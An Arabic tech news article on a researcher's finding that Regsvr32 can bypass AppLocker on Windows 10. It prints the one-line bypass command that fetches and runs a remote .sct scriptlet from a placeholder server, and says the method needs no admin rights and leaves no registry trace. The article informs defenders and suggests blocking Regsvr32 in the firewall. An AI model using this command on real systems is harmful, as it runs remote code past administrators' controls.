اكتشف باحث من كولورادو يدعى كاسي سميث أنه يمكن استخدام Regsvr32 لتجاوز AppLocker على نظام التشغيل Windows 10 ، وهذه مشكلة كبيرة لمستخدمي الكمبيوتر ، خاصة في بيئة الأعمال.

تم تقديم تطبيق AppLocker لأول مرة في نظامي التشغيل Windows 7 و Windows Server 2008 R2. إنه مصمم للسماح للمسؤولين بتحديد المجموعة أو المستخدمين الذين يمكنهم الاستفادة من بعض أو كل التطبيقات استنادًا إلى الهوية الفريدة للملفات. إذا كنت شخصًا يميل إلى استخدام AppLocker ، فيجب أن يكون من المعروف أنه يمكن استخدامه لإنشاء قواعد معينة للسماح للتطبيقات بتشغيلها أو إيقافها في مساراتها.

بالنسبة لأولئك الذين قد يكونوا غير مدركين ، يمكن استخدام Regvr32 لتسجيل وإلغاء تسجيل DLL. هذه ليست أداة بنقرة واحدة ترى لأنها أداة مساعدة لسطر الأوامر ، لذلك يجب على مستخدمي الكمبيوتر المتقدمين فقط السعي للاستفادة مما تقدمه.

نحن نفهم أنه باستخدام هذه التقنية ، فإنه لا يغير سجل نظام الكمبيوتر ، مما يجعل من الصعب على المشرفين معرفة ما إذا كان قد تم إجراء أي تغييرات.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

"الشيء المذهل هنا هو أن regsvr32 يعرف الوكيل بالفعل ، ويستخدم TLS ، ويتبع عمليات إعادة التوجيه ، وما إلى ذلك … و … لقد فكرت في ثنائي MS موقّع افتراضي. لذلك ، كل ما عليك القيام به هو استضافة ملفك الخاص في الموقع الذي تتحكم فيه.

لا يتطلب الأسلوب أعلاه امتيازات إدارية ولا يغير السجل. علاوة على ذلك ، يمكن استدعاء البرامج النصية على كل من HTTP أو HTTPS. في الوقت الحالي ، لم تصدر Microsoft تصحيحًا لهذه المشكلة الصغيرة ، لذا فإن الخيار الوحيد في هذه المرحلة هو حظر Regsvr32 عبر جدار حماية Windows.

ومن المثير للاهتمام أن شركة البرمجيات العملاقة لم تستجب بعد لهذه المشكلة الأمنية التي تواجه نظام التشغيل. الآن بعد أن بدأ العرض في الخارج ، نتوقع أن نسمع شيئًا من الشركة إلى جانب محادثات حول التصحيح في المستقبل.